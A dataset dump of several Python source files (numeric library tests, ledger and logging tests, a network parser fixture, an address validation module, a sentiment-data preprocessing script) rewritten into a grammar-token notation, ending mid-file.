content stringlengths 0 1.55M |
|---|
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>numpy<as>np<import_from_stmt>test_tools.generators mk_seq_array<import_stmt>cunumeric<as>num<import_from_stmt>legate.core LEGATE_MAX_DIM<def_stmt>test <block_start>choices1=[[0 1 2 3] [10 11 12 13] [20 21 22 23] [30 31 32 33] ]<line_sep>a1=[2 3 1 0]<line_sep>num_a1=num.array(a1)<line_sep>num_choices1=num.array(choices1)<line_sep>aout=np.array([2.3 3.0 1.2 0.3])<line_sep>num_aout=num.array(aout)<assert_stmt>np.array_equal(np.choose(a1 choices1 out=aout) num.choose(num_a1 num_choices1 out=num_aout) )<assert_stmt>np.array_equal(aout num_aout)<line_sep>b=[2 4 1 0]<line_sep>num_b=num.array(b)<assert_stmt>np.array_equal(np.choose(b choices1 mode="clip") num.choose(num_b num_choices1 mode="clip") )<assert_stmt>np.array_equal(np.choose(b choices1 mode="wrap") num.choose(num_b num_choices1 mode="wrap") )<line_sep>a2=[[1 0 1] [0 1 0] [1 0 1]]<line_sep>choices2=[-10 10]<line_sep>num_a2=num.array(a2)<line_sep>num_choices2=num.array(choices2)<assert_stmt>np.array_equal(num.choose(num_a2 num_choices2) np.choose(a2 choices2))<line_sep>a3=np.array([0 1]).reshape((2 1 1))<line_sep>c1=np.array([1 2 3]).reshape((1 3 1))<line_sep>c2=np.array([-1 -2 -3 -4 -5]).reshape((1 1 5))<line_sep>num_a3=num.array(a3)<line_sep>num_c1=num.array(c1)<line_sep>num_c2=num.array(c2)<assert_stmt>np.array_equal(np.choose(a3 (c1 c2)) num.choose(num_a3 (num_c1 num_c2)))<for_stmt>ndim range(1 LEGATE_MAX_DIM+1)<block_start>tgt_shape=(5 )<times>ndim<line_sep># try various shapes that broadcast to the target shape
shapes=[tgt_shape]<for_stmt>d range(len(tgt_shape))<block_start>sh=list(tgt_shape)<line_sep>sh[d]=1<line_sep>shapes.append(tuple(sh))<block_end><for_stmt>choices_shape shapes# make sure the choices are between 0 and 1
<block_start>np_choices=mk_seq_array(np choices_shape)%2<line_sep>num_choices=mk_seq_array(num choices_shape)%2<for_stmt>rhs1_shape shapes<block_start>np_rhs1=np.full(rhs1_shape 42)<line_sep>num_rhs1=num.full(rhs1_shape 42)<for_stmt>rhs2_shape shapes# make sure rhs1 and rhs2 have different values
<block_start>np_rhs2=np.full(rhs2_shape 17)<line_sep>num_rhs2=num.full(rhs2_shape 17)<line_sep>np_res=np.choose(np_choices (np_rhs1 np_rhs2))<line_sep>num_res=num.choose(num_choices (num_rhs1 num_rhs2))<assert_stmt>np.array_equal(np_res num_res)<block_end><block_end><block_end><block_end><return><block_end><if_stmt>__name__<eq>"__main__"<block_start>test()<block_end> |
<import_stmt>json<import_stmt>pytest<import_from_stmt>indy ledger error<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_raw_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>raw='{"endpoint":{"ha":"127.0.0.1:5555"}}'<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "raw":raw}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination <none> raw <none>))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_hash_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>xhash="83d907821df1c87db829e96569a11f6fc2e7880acba5e43d07ab786959e13bd3"<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "hash":xhash}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination xhash <none> <none>))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_enc_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>enc="aa3f41f619aa7e5e6b6d0de555e05331787f9bf9aa672b94b57ab65b9b66c3ea960b18a98e3834b1fc6cebf49f463b81fd6e3181"<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "enc":enc}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination <none> <none> enc))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_missed_attribute <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<with_stmt>pytest.raises(error.CommonInvalidStructure)<block_start><await>ledger.build_attrib_request(identifier destination <none> <none> <none>)<block_end><block_end> |
<import_stmt>warnings<import_from_stmt>typing Tuple Callable Any List<import_stmt>numpy<as>np<import_from_stmt>nebullvm.base QuantizationType<import_from_stmt>nebullvm.inference_learners.base BaseInferenceLearner<import_from_stmt>nebullvm.measure compute_relative_difference<def_stmt>check_precision optimized_learner:BaseInferenceLearner input_data:List[Tuple[Any <ellipsis>]] base_outputs_list:List[Tuple[Any <ellipsis>]] perf_loss_ths:float metric_func:Callable=<none> ys:List=<none> aggregation_func:Callable=np.mean <arrow>bool<block_start>metric_func=metric_func<or>compute_relative_difference<line_sep>relative_differences=[]<if_stmt>ys<is><none><block_start>ys=[<none>]<times>len(input_data)<block_end><for_stmt>inputs,base_outputs,y zip(input_data base_outputs_list ys)<block_start>opt_outputs=optimized_learner(*inputs)<line_sep>relative_difference=max(metric_func(base_output opt_output y)<for>base_output,opt_output zip(base_outputs opt_outputs))<line_sep>relative_differences.append(relative_difference)<block_end>relative_difference=aggregation_func(relative_differences)<line_sep><return>relative_difference<le>perf_loss_ths<block_end><def_stmt>check_quantization quantization_type:QuantizationType perf_loss_ths:float<block_start><if_stmt>quantization_type<is><none><and>perf_loss_ths<is><not><none><block_start><raise>ValueError("When a quantization threshold is given it is necessary to "<concat>"specify the quantization algorithm too.")<block_end><if_stmt>quantization_type<is><not><none><and>perf_loss_ths<is><none><block_start>warnings.warn("Got a valid quantization type without any given quantization "<concat>"threshold. The quantization step will be ignored.")<block_end><block_end> |
<import_stmt>unittest<import_stmt>mock<import_from_stmt>copy copy<import_from_stmt>tests BaseTest<import_stmt>logging<line_sep># Units under test
<import_stmt>cadquery<import_from_stmt>cadquery.freecad_impl console_logging<class_stmt>TestLogging(BaseTest)<block_start><def_stmt>setUp self# save root logger's state
<block_start>root_logger=logging.getLogger()<line_sep>self._initial_level=root_logger.level<line_sep>self._initial_logging_handlers=copy(root_logger.handlers)<block_end><def_stmt>tearDown self# forcefully re-establish original log state
<block_start>root_logger=logging.getLogger()<line_sep>root_logger.level=self._initial_level<line_sep>root_logger.handlers=self._initial_logging_handlers<line_sep># reset console_logging's global state
cadquery.freecad_impl.console_logging._logging_handler=<none><block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleMessage self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.info('foo')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('foo\n')<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleWarning self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.warning('bar')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_called_once_with('bar\n')<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleError self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.error('roo')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_called_once_with('roo\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleDebugOffDefault self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.debug('no show')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleSetLevelDebug self mock_freecad<block_start>console_logging.enable(level=logging.DEBUG)<line_sep>log=logging.getLogger('test')<line_sep>log.debug('now showing')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('now showing\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleSetLevelWarning self mock_freecad<block_start>console_logging.enable(level=logging.WARNING)<line_sep>log=logging.getLogger('test')<line_sep>log.info('no show')<line_sep>log.warning('be warned')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_called_once_with('be warned\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleLogFormat self mock_freecad<block_start>console_logging.enable(format=">> %(message)s <<")<line_sep>log=logging.getLogger('test')<line_sep>log.info('behold brackets!')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('>> behold brackets! <<\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleEnableDisable self mock_freecad<block_start>console_logging.enable()<line_sep>console_logging.disable()<line_sep>log=logging.getLogger('test')<line_sep>log.error('nope, disabled')<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end><block_end> |
print(-1)<line_sep>print(-0)<line_sep>print(-(6))<line_sep>print(-(12<times>2))<line_sep>print(--10)<line_sep> |
expected_output={"key_chains":{"bla":{"keys":{1:{"accept_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } "key_string":"cisco123" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } 2:{"accept_lifetime":{"end":"06:01:00 UTC Jan 1 2010" "is_valid":<false> "start":"10:10:10 UTC Jan 1 2002" } "key_string":"blabla" "send_lifetime":{"end":"06:01:00 UTC Jan 1 2010" "is_valid":<false> "start":"10:10:10 UTC Jan 1 2002" } } } } "cisco":{"keys":{1:{"accept_lifetime":{"end":"infinite" "is_valid":<true> "start":"11:11:11 UTC Mar 1 2001" } "key_string":"cisco123" "send_lifetime":{"end":"infinite" "is_valid":<true> "start":"11:11:11 UTC Mar 1 2001" } } 2:{"accept_lifetime":{"end":"22:11:11 UTC Dec 20 2030" "is_valid":<true> "start":"11:22:11 UTC Jan 1 2001" } "key_string":"cisco234" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } 3:{"accept_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } "key_string":"cisco" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } } } } }<line_sep> |
# Generated by Django 1.10.7 on 2017-07-11 12:26
<import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('phonelog' '0012_server_date_not_null') ]<line_sep>operations=[migrations.DeleteModel(name='OldDeviceReportEntry' ) ]<block_end> |
<import_from_future_stmt> unicode_literals<import_stmt>io<import_stmt>json<import_stmt>os<import_stmt>re<import_from_stmt>collections OrderedDict<line_sep>VALID_COUNTRY_CODE=re.compile(r"^\w{2,3}$")<line_sep>VALIDATION_DATA_DIR=os.path.join(os.path.dirname(__file__) "data")<line_sep>VALIDATION_DATA_PATH=os.path.join(VALIDATION_DATA_DIR "%s.json")<line_sep>FIELD_MAPPING={"A":"street_address" "C":"city" "D":"city_area" "N":"name" "O":"company_name" "S":"country_area" "X":"sorting_code" "Z":"postal_code" }<line_sep>KNOWN_FIELDS=set(FIELD_MAPPING.values())|{"country_code"}<def_stmt>load_validation_data country_code="all"<block_start><if_stmt><not>VALID_COUNTRY_CODE.match(country_code)<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end>country_code=country_code.lower()<try_stmt># VALIDATION_DATA_PATH may have '%' symbols
# for backwards compatability if VALIDATION_DATA_PATH is imported
# by consumers of this package.
<block_start>path=VALIDATION_DATA_PATH%(country_code )<block_end><except_stmt>TypeError<block_start>path=os.path.join(VALIDATION_DATA_DIR "%s.json"%country_code)<block_end><if_stmt><not>os.path.exists(path)<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end><with_stmt>io.open(path encoding="utf-8")<as>data<block_start><return>json.load(data)<block_end><block_end><class_stmt>ValidationRules(object)<block_start>__slots__=["country_code" "country_name" "address_format" "address_latin_format" "allowed_fields" "required_fields" "upper_fields" "country_area_type" "country_area_choices" "city_type" "city_choices" "city_area_type" "city_area_choices" "postal_code_type" "postal_code_matchers" "postal_code_examples" "postal_code_prefix" ]<def_stmt>__init__ self country_code country_name address_format address_latin_format allowed_fields required_fields upper_fields country_area_type country_area_choices city_type city_choices city_area_type city_area_choices postal_code_type postal_code_matchers postal_code_examples postal_code_prefix <block_start>self.country_code=country_code<line_sep>self.country_name=country_name<line_sep>self.address_format=address_format<line_sep>self.address_latin_format=address_latin_format<line_sep>self.allowed_fields=allowed_fields<line_sep>self.required_fields=required_fields<line_sep>self.upper_fields=upper_fields<line_sep>self.country_area_type=country_area_type<line_sep>self.country_area_choices=country_area_choices<line_sep>self.city_type=city_type<line_sep>self.city_choices=city_choices<line_sep>self.city_area_type=city_area_type<line_sep>self.city_area_choices=city_area_choices<line_sep>self.postal_code_type=postal_code_type<line_sep>self.postal_code_matchers=postal_code_matchers<line_sep>self.postal_code_examples=postal_code_examples<line_sep>self.postal_code_prefix=postal_code_prefix<block_end><def_stmt>__repr__ self<block_start><return>("ValidationRules("<concat>"country_code=%r, "<concat>"country_name=%r, "<concat>"address_format=%r, "<concat>"address_latin_format=%r, "<concat>"allowed_fields=%r, "<concat>"required_fields=%r, "<concat>"upper_fields=%r, "<concat>"country_area_type=%r, "<concat>"country_area_choices=%r, "<concat>"city_type=%r, "<concat>"city_choices=%r, "<concat>"city_area_type=%r, "<concat>"city_area_choices=%r, "<concat>"postal_code_type=%r, "<concat>"postal_code_matchers=%r, "<concat>"postal_code_examples=%r, "<concat>"postal_code_prefix=%r)"%(self.country_code self.country_name self.address_format self.address_latin_format self.allowed_fields self.required_fields self.upper_fields self.country_area_type self.country_area_choices self.city_type self.city_choices self.city_area_type self.city_area_choices self.postal_code_type self.postal_code_matchers self.postal_code_examples self.postal_code_prefix ))<block_end><block_end><def_stmt>_make_choices rules translated=<false><block_start>sub_keys=rules.get("sub_keys")<if_stmt><not>sub_keys<block_start><return>[]<block_end>choices=[]<line_sep>sub_keys=sub_keys.split("~")<line_sep>sub_names=rules.get("sub_names")<if_stmt>sub_names<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_names.split("~"))<if>value]<block_end><else_stmt><block_start><if_stmt><not>translated<block_start>choices<augadd>[(key key)<for>key sub_keys]<block_end><block_end><if_stmt><not>translated<block_start>sub_lnames=rules.get("sub_lnames")<if_stmt>sub_lnames<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_lnames.split("~"))<if>value]<block_end>sub_lfnames=rules.get("sub_lfnames")<if_stmt>sub_lfnames<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_lfnames.split("~"))<if>value]<block_end><block_end><return>choices<block_end><def_stmt>_compact_choices choices<block_start>value_map=OrderedDict()<for_stmt>key,value choices<block_start><if_stmt><not>key<in>value_map<block_start>value_map[key]=set()<block_end>value_map[key].add(value)<block_end><return>[(key value)<for>key,values value_map.items()<for>value sorted(values)]<block_end><def_stmt>_match_choices value choices<block_start><if_stmt>value<block_start>value=value.strip().lower()<block_end><for_stmt>name,label choices<block_start><if_stmt>name.lower()<eq>value<block_start><return>name<block_end><if_stmt>label.lower()<eq>value<block_start><return>name<block_end><block_end><block_end><def_stmt>_load_country_data country_code<block_start>database=load_validation_data("zz")<line_sep>country_data=database["ZZ"]<if_stmt>country_code<block_start>country_code=country_code.upper()<if_stmt>country_code.lower()<eq>"zz"<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end>database=load_validation_data(country_code.lower())<line_sep>country_data.update(database[country_code])<block_end><return>country_data database<block_end><def_stmt>get_validation_rules address<block_start>country_code=address.get("country_code" "").upper()<line_sep>country_data,database=_load_country_data(country_code)<line_sep>country_name=country_data.get("name" "")<line_sep>address_format=country_data["fmt"]<line_sep>address_latin_format=country_data.get("lfmt" address_format)<line_sep>format_fields=re.finditer(r"%([ACDNOSXZ])" address_format)<line_sep>allowed_fields={FIELD_MAPPING[m.group(1)]<for>m format_fields}<line_sep>required_fields={FIELD_MAPPING[f]<for>f country_data["require"]}<line_sep>upper_fields={FIELD_MAPPING[f]<for>f country_data["upper"]}<line_sep>languages=[<none>]<if_stmt>"languages"<in>country_data<block_start>languages=country_data["languages"].split("~")<block_end>postal_code_matchers=[]<if_stmt>"postal_code"<in>allowed_fields<block_start><if_stmt>"zip"<in>country_data<block_start>postal_code_matchers.append(re.compile("^"+country_data["zip"]+"$"))<block_end><block_end>postal_code_examples=[]<if_stmt>"zipex"<in>country_data<block_start>postal_code_examples=country_data["zipex"].split(",")<block_end>country_area_choices=[]<line_sep>city_choices=[]<line_sep>city_area_choices=[]<line_sep>country_area_type=country_data["state_name_type"]<line_sep>city_type=country_data["locality_name_type"]<line_sep>city_area_type=country_data["sublocality_name_type"]<line_sep>postal_code_type=country_data["zip_name_type"]<line_sep>postal_code_prefix=country_data.get("postprefix" "")<line_sep># second level of data is for administrative areas
country_area=<none><line_sep>city=<none><line_sep>city_area=<none><if_stmt>country_code<in>database<block_start><if_stmt>"sub_keys"<in>country_data<block_start><for_stmt>language languages<block_start>is_default_language=(language<is><none><or>language<eq>country_data["lang"])<line_sep>matched_country_area=<none><line_sep>matched_city=<none><if_stmt>is_default_language<block_start>localized_country_data=database[country_code]<block_end><else_stmt><block_start>localized_country_data=database["%s--%s"%(country_code language)]<block_end>localized_country_area_choices=_make_choices(localized_country_data)<line_sep>country_area_choices<augadd>localized_country_area_choices<line_sep>existing_choice=country_area<is><not><none><line_sep>matched_country_area=country_area=_match_choices(address.get("country_area") localized_country_area_choices)<if_stmt>matched_country_area# third level of data is for cities
<block_start><if_stmt>is_default_language<block_start>country_area_data=database["%s/%s"%(country_code country_area)]<block_end><else_stmt><block_start>country_area_data=database["%s/%s--%s"%(country_code country_area language)]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>country_area_data<block_start>postal_code_matchers.append(re.compile("^"+country_area_data["zip"]))<block_end><if_stmt>"zipex"<in>country_area_data<block_start>postal_code_examples=country_area_data["zipex"].split(",")<block_end><block_end><if_stmt>"sub_keys"<in>country_area_data<block_start>localized_city_choices=_make_choices(country_area_data)<line_sep>city_choices<augadd>localized_city_choices<line_sep>existing_choice=city<is><not><none><line_sep>matched_city=city=_match_choices(address.get("city") localized_city_choices)<block_end><if_stmt>matched_city# fourth level of data is for dependent sublocalities
<block_start><if_stmt>is_default_language<block_start>city_data=database["%s/%s/%s"%(country_code country_area city)]<block_end><else_stmt><block_start>city_data=database["%s/%s/%s--%s"%(country_code country_area city language)]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>city_data<block_start>postal_code_matchers.append(re.compile("^"+city_data["zip"]))<block_end><if_stmt>"zipex"<in>city_data<block_start>postal_code_examples=city_data["zipex"].split(",")<block_end><block_end><if_stmt>"sub_keys"<in>city_data<block_start>localized_city_area_choices=_make_choices(city_data)<line_sep>city_area_choices<augadd>localized_city_area_choices<line_sep>existing_choice=city_area<is><not><none><line_sep>matched_city_area=city_area=_match_choices(address.get("city_area") localized_city_area_choices)<if_stmt>matched_city_area<block_start><if_stmt>is_default_language<block_start>city_area_data=database["%s/%s/%s/%s"%(country_code country_area city city_area)]<block_end><else_stmt><block_start>city_area_data=database["%s/%s/%s/%s--%s"%(country_code country_area city city_area language )]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>city_area_data<block_start>postal_code_matchers.append(re.compile("^"+city_area_data["zip"]))<block_end><if_stmt>"zipex"<in>city_area_data<block_start>postal_code_examples=city_area_data["zipex"].split(",")<block_end><block_end><block_end><block_end><block_end><block_end><block_end><block_end>country_area_choices=_compact_choices(country_area_choices)<line_sep>city_choices=_compact_choices(city_choices)<line_sep>city_area_choices=_compact_choices(city_area_choices)<block_end><return>ValidationRules(country_code country_name address_format address_latin_format allowed_fields required_fields upper_fields country_area_type country_area_choices city_type city_choices city_area_type city_area_choices postal_code_type postal_code_matchers postal_code_examples postal_code_prefix )<block_end><class_stmt>InvalidAddress(ValueError)<block_start><def_stmt>__init__ self message errors<block_start>super(InvalidAddress self).__init__(message)<line_sep>self.errors=errors<block_end><block_end><def_stmt>_normalize_field name rules data choices errors<block_start>value=data.get(name)<if_stmt>name<in>rules.upper_fields<and>value<is><not><none><block_start>value=value.upper()<line_sep>data[name]=value<block_end><if_stmt>name<not><in>rules.allowed_fields<block_start>data[name]=""<block_end><elif_stmt><not>value<and>name<in>rules.required_fields<block_start>errors[name]="required"<block_end><elif_stmt>choices<block_start><if_stmt>value<or>name<in>rules.required_fields<block_start>value=_match_choices(value choices)<if_stmt>value<is><not><none><block_start>data[name]=value<block_end><else_stmt><block_start>errors[name]="invalid"<block_end><block_end><block_end><if_stmt><not>value<block_start>data[name]=""<block_end><block_end><def_stmt>normalize_address address<block_start>errors={}<try_stmt><block_start>rules=get_validation_rules(address)<block_end><except_stmt>ValueError<block_start>errors["country_code"]="invalid"<block_end><else_stmt><block_start>cleaned_data=address.copy()<line_sep>country_code=cleaned_data.get("country_code")<if_stmt><not>country_code<block_start>errors["country_code"]="required"<block_end><else_stmt><block_start>cleaned_data["country_code"]=country_code.upper()<block_end>_normalize_field("country_area" rules cleaned_data rules.country_area_choices errors)<line_sep>_normalize_field("city" rules cleaned_data rules.city_choices errors)<line_sep>_normalize_field("city_area" rules cleaned_data rules.city_area_choices errors)<line_sep>_normalize_field("postal_code" rules cleaned_data [] errors)<line_sep>postal_code=cleaned_data.get("postal_code" "")<if_stmt>rules.postal_code_matchers<and>postal_code<block_start><for_stmt>matcher rules.postal_code_matchers<block_start><if_stmt><not>matcher.match(postal_code)<block_start>errors["postal_code"]="invalid"<line_sep><break><block_end><block_end><block_end>_normalize_field("street_address" rules cleaned_data [] errors)<line_sep>_normalize_field("sorting_code" rules cleaned_data [] errors)<block_end><if_stmt>errors<block_start><raise>InvalidAddress("Invalid address" errors)<block_end><return>cleaned_data<block_end><def_stmt>_format_address_line line_format address rules<block_start><def_stmt>_get_field name<block_start>value=address.get(name "")<if_stmt>name<in>rules.upper_fields<block_start>value=value.upper()<block_end><return>value<block_end>replacements={"%%%s"%code:_get_field(field_name)<for>code,field_name FIELD_MAPPING.items()}<line_sep>fields=re.split("(%.)" line_format)<line_sep>fields=[replacements.get(f f)<for>f fields]<line_sep><return>"".join(fields).strip()<block_end><def_stmt>get_field_order address latin=<false><block_start>"""
Returns expected order of address form fields as a list of lists.
Example for PL:
>>> get_field_order({'country_code': 'PL'})
[[u'name'], [u'company_name'], [u'street_address'], [u'postal_code', u'city']]
"""<line_sep>rules=get_validation_rules(address)<line_sep>address_format=rules.address_latin_format<if>latin<else>rules.address_format<line_sep>address_lines=address_format.split("%n")<line_sep>replacements={"%%%s"%code:field_name<for>code,field_name FIELD_MAPPING.items()}<line_sep>all_lines=[]<for_stmt>line address_lines<block_start>fields=re.split("(%.)" line)<line_sep>single_line=[replacements.get(field)<for>field fields]<line_sep>single_line=list(filter(<none> single_line))<line_sep>all_lines.append(single_line)<block_end><return>all_lines<block_end><def_stmt>format_address address latin=<false><block_start>rules=get_validation_rules(address)<line_sep>address_format=rules.address_latin_format<if>latin<else>rules.address_format<line_sep>address_line_formats=address_format.split("%n")<line_sep>address_lines=[_format_address_line(lf address rules)<for>lf address_line_formats]<line_sep>address_lines.append(rules.country_name)<line_sep>address_lines=filter(<none> address_lines)<line_sep><return>"\n".join(address_lines)<block_end><def_stmt>latinize_address address normalized=<false><block_start><if_stmt><not>normalized<block_start>address=normalize_address(address)<block_end>cleaned_data=address.copy()<line_sep>country_code=address.get("country_code" "").upper()<line_sep>dummy_country_data,database=_load_country_data(country_code)<if_stmt>country_code<block_start>country_area=address["country_area"]<if_stmt>country_area<block_start>key="%s/%s"%(country_code country_area)<line_sep>country_area_data=database.get(key)<if_stmt>country_area_data<block_start>cleaned_data["country_area"]=country_area_data.get("lname" country_area_data.get("name" country_area))<line_sep>city=address["city"]<line_sep>key="%s/%s/%s"%(country_code country_area city)<line_sep>city_data=database.get(key)<if_stmt>city_data<block_start>cleaned_data["city"]=city_data.get("lname" city_data.get("name" city))<line_sep>city_area=address["city_area"]<line_sep>key="%s/%s/%s/%s"%(country_code country_area city city_area)<line_sep>city_area_data=database.get(key)<if_stmt>city_area_data<block_start>cleaned_data["city_area"]=city_area_data.get("lname" city_area_data.get("name" city_area))<block_end><block_end><block_end><block_end><block_end><return>cleaned_data<block_end> |
<import_stmt>os<import_from_stmt>data_utils_sentihood *<line_sep>data_dir='../data/sentihood/'<line_sep>aspect2idx={'general':0 'price':1 'transit-location':2 'safety':3 }<line_sep>(train train_aspect_idx),(val val_aspect_idx),(test test_aspect_idx)=load_task(data_dir aspect2idx)<line_sep>print("len(train) = " len(train))<line_sep>print("len(val) = " len(val))<line_sep>print("len(test) = " len(test))<line_sep>train.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>val.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>test.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>dir_path=data_dir+'bert-pair/'<if_stmt><not>os.path.exists(dir_path)<block_start>os.makedirs(dir_path)<block_end><with_stmt>open(dir_path+"train_NLI_M.tsv" "w" encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v train<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end><with_stmt>open(dir_path+"dev_NLI_M.tsv" "w" encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v val<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end><with_stmt>open(dir_path+"test_NLI_M.tsv" "w" encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v test<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' 